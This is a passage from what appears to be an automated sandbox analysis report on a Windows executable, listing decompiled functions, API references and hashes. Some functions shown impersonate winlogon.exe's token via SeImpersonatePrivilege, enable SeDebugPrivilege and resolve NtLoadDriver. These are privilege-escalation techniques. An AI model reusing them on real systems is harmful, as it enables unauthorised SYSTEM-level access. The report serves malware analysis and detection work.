				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                      0x00401f04
                                                                                      0x00401f20
                                                                                      0x00401f27
                                                                                      0x00401f38
                                                                                      0x00401f3f
                                                                                      0x00401f4e
                                                                                      0x00401f54
                                                                                      0x00401f5f
                                                                                      0x00401f6e
                                                                                      0x00401f72
                                                                                      0x00401f77
                                                                                      0x00401f78
                                                                                      0x00401f91
                                                                                      0x00401f7a
                                                                                      0x00401f88
                                                                                      0x00401f8e
                                                                                      0x00401f8e
                                                                                      0x00401fa6
                                                                                      0x00401fa9
                                                                                      0x00401fae
                                                                                      0x00401fb0
                                                                                      0x00401fb2
                                                                                      0x00401fb9
                                                                                      0x00401fc2
                                                                                      0x00401fca
                                                                                      0x00401fd2
                                                                                      0x00401fd2
                                                                                      0x00401fd7
                                                                                      0x00401fd7
                                                                                      0x00401fe3

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00401F27
                                                                                      • memset.MSVCRT ref: 00401F3F
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                      • wcslen.MSVCRT ref: 00401F5A
                                                                                      • wcslen.MSVCRT ref: 00401F69
                                                                                      • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                        • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                        • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                      • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                      • API String ID: 3867304300-2177360481
                                                                                      • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                      • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                      • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                      • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                      0x0040955f
                                                                                      0x00409566
                                                                                      0x0040956e
                                                                                      0x00409576
                                                                                      0x00409586
                                                                                      0x00409586
                                                                                      0x0040956e
                                                                                      0x00409592
                                                                                      0x004095aa
                                                                                      0x00409594
                                                                                      0x004095a3
                                                                                      0x004095a6
                                                                                      0x004095a6

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                      • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                      • API String ID: 1714573020-3385500049
                                                                                      • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                      • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                      • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                      • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 84%
                                                                                      			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                      0x00402f3a
                                                                                      0x00402f51
                                                                                      0x00402f60
                                                                                      0x00402f6f
                                                                                      0x00402f78
                                                                                      0x00402f7a
                                                                                      0x00402f7a
                                                                                      0x00402f8a
                                                                                      0x00402f8f
                                                                                      0x00402f94
                                                                                      0x00402f99
                                                                                      0x00402f9e
                                                                                      0x00402f9f
                                                                                      0x00402fad
                                                                                      0x00402fb2
                                                                                      0x00402fb2
                                                                                      0x00402fbd
                                                                                      0x00402fc5

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402F51
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • wcsrchr.MSVCRT ref: 00402F6F
                                                                                      • wcscat.MSVCRT ref: 00402F8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                      • String ID: .cfg
                                                                                      • API String ID: 776488737-3410578098
                                                                                      • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                      • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                      • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                      • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 35%
                                                                                      			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                      0x00409ddc
                                                                                      0x00409de4
                                                                                      0x00409df0
                                                                                      0x00409df5
                                                                                      0x00409df6
                                                                                      0x00409e03
                                                                                      0x00409e05
                                                                                      0x00409e06
                                                                                      0x00409e3b
                                                                                      0x00409e5d
                                                                                      0x00409e6a
                                                                                      0x00409e73
                                                                                      0x00409e75
                                                                                      0x00409e08
                                                                                      0x00409e08
                                                                                      0x00409e19
                                                                                      0x00409e37
                                                                                      0x00409e37
                                                                                      0x00409e81

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00409E08
                                                                                        • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                        • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                      • memset.MSVCRT ref: 00409E3B
                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1127616056-0
                                                                                      • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                      • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                      • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                      • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                      0x00404951
                                                                                      0x00404952
                                                                                      0x00404956
                                                                                      0x004049a1
                                                                                      0x00404958
                                                                                      0x00404959
                                                                                      0x0040495b
                                                                                      0x0040495b
                                                                                      0x0040495f
                                                                                      0x00404961
                                                                                      0x00404963
                                                                                      0x0040496d
                                                                                      0x00404975
                                                                                      0x00404977
                                                                                      0x0040497b
                                                                                      0x00404985
                                                                                      0x0040498a
                                                                                      0x0040498e
                                                                                      0x00404993
                                                                                      0x0040499d
                                                                                      0x0040499d

                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 0040496D
                                                                                      • memcpy.MSVCRT ref: 00404985
                                                                                      • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: freemallocmemcpy
                                                                                      • String ID: W@
                                                                                      • API String ID: 3056473165-1729568415
                                                                                      • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                      • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                      • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                      • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                      0x0040543f
                                                                                      0x00405456
                                                                                      0x00405462
                                                                                      0x00405467
                                                                                      0x0040546d
                                                                                      0x00405478
                                                                                      0x00405489
                                                                                      0x0040548d
                                                                                      0x00000000
                                                                                      0x00405492
                                                                                      0x00405496

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                        • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                        • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                      • wcscat.MSVCRT ref: 00405478
                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 3725422290-0
                                                                                      • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                      • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                      • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                      • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                        • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                        • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                        • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                      • String ID:
                                                                                      • API String ID: 4232544981-0
                                                                                      • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                      • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                      • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                      • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                      0x00408f4c
                                                                                      0x00408f57
                                                                                      0x00408f60
                                                                                      0x00408f62
                                                                                      0x00408f67
                                                                                      0x00408f67
                                                                                      0x00408f71

                                                                                      APIs
                                                                                        • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                        • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                      • String ID:
                                                                                      • API String ID: 187924719-0
                                                                                      • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                      • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                      • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                      • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 37%
                                                                                      			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                      0x004098fa
                                                                                      0x004098fc
                                                                                      0x00409901
                                                                                      0x00409907
                                                                                      0x00000000
                                                                                      0x0040991c
                                                                                      0x00409918
                                                                                      0x00000000

                                                                                      APIs
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$FileModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3859505661-0
                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                      • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                      • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                      0x004095da
                                                                                      0x004095da
                                                                                      0x004095de
                                                                                      0x004095e1
                                                                                      0x004095e7
                                                                                      0x004095e7
                                                                                      0x004095ee
                                                                                      0x004095fc

                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                      • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                      • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                      • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                      0x0040a3d0
                                                                                      0x0040a3d9

                                                                                      APIs
                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: EnumNamesResource
                                                                                      • String ID:
                                                                                      • API String ID: 3334572018-0
                                                                                      • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                      • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                      • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                      • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
